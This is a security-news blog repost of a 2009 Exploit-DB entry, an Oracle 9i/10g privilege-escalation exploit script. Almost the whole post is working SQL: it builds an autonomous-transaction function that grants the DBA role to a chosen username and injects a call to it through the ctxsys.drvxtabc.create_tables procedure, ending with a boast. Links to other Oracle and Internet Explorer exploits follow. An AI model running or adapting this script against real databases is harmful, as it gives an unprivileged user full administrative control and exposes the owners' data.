Vulnerable InforMation And IT News

# Title: Oracle ctxsys.drvxtabc.create_tables Exploit

# EDB-ID: 10267

# CVE-ID: ()

# OSVDB-ID: ()

# Author: Andrea Purificato

# Published: 2009-12-01

# Verified: yes

# Download Code

# Download N/A

view sourceprint?

–

– ctxsys.drvxtabc.create_tables

–

–

– Oracle ctxsys.drvxtabc.create_tables exploit (9i/10g)

–

– Grant dba permission to unprivileged user

–

–

– REF: http://www.google.it/search?q=ctxsys.drvxtabc.create_tables

–

– AUTHOR: Andrea “bunker” Purificato

– http://rawlab.mindcreations.com

–

–

set serveroutput on;

prompt [+] ctxsys-drvxtabc-create_tables.sql exploit

prompt [+] by Andrea “bunker” Purificato – http://rawlab.mindcreations.com

prompt [+] 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2

prompt

undefine the_user;

accept the_user char prompt ‘Target username (default TEST): ‘ default ‘TEST’;

prompt

prompt [-] Building evil function…

 

CREATE OR REPLACE FUNCTION OWN RETURN NUMBER

AUTHID CURRENT_USER AS

PRAGMA AUTONOMOUS_TRANSACTION;

BEGIN

EXECUTE IMMEDIATE ‘GRANT DBA TO &the_user’; COMMIT;

RETURN(0);

END;

/

 

prompt [-] Finishing…

 

exec ctxsys.drvxtabc.create_tables(”||user||’”.”x” as select * from dual where ‘||USER||’.own=0–’,'x’,2);

 

prompt [-] YOU GOT THE POWAH!!

Related Posts

• Oracle SYS.LT.REMOVEWORKSPACE Evil Cursor Exploit
• Oracle SYS.LT.REMOVEWORKSPACE Evil Cursor Exploit
• Proof of concept exploit for Oracle Database versions 10.1.0.5 and 10.2.0.4
• Microsoft Internet Explorer iepeers.dll Use-After-Free Exploit (meta)
• Internet Explorer (6/7) Remote Code Execution -Remote User Add Exploit
• Internet Explorer Aurora Exploit

Tags: Exploit, Oracle

This entry was posted on Friday, December 4th, 2009 at 1:16 pm and is filed under Vulnerable InforMation, exploit. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.